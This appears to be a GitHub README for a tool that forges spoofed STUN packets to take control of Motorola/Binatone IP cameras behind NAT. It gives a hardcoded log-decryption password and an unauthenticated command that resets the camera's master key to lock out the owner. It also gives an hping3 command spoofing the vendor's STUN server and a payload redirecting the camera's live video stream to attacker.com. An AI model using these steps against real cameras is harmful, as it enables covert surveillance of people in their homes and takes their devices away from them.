Skip to content

pombredanne/stun-remote-control

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

TL;DR

This script makes special STUN packets to control Motorola/Binatone IP cameras behind NAT

It has been tested with a Motorola FOCUS 73.

Requirements

Getting the AES key

There are different ways to get the key:

Download it

If you can access the device locally, visit :8080/cgi-bin/logdownload.cgi then decrypt the logs with Cvision123459876

Set it

If you want to control it AND stop the owner accessing it... :80/?action=command&command=set_master_key=MyCameraNowThanx

Read it from the file system

Get a root shell on the camera with a bit of javascript (see blog) then find skyeye.conf. The AES key is in there.

Execution

python stunning.py “set_wowza_server&value=10.45.3.100” > stunpacket

hping3 10.45.3.62 --udp -V -p 50610 --spoof stun.hubble.in -s 3478 --file stunpacket --data $(stat -c%s stunpacket) -c 1

Note: The UDP source port will always be 3478 but the destination port is dynamic. If you have access to the camera you can find it with netstat otherwise you will need to try different ports with the following 2 payloads to find the right UDP port. set_wowza_server&value=attacker.com

start_rtmp

You will know you've got the right port because you'll receive a live RTMP video stream on TCP 1935. Red5 can be used to receive the video.

About

Control Motorola/Binatone IP cameras behind NAT

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%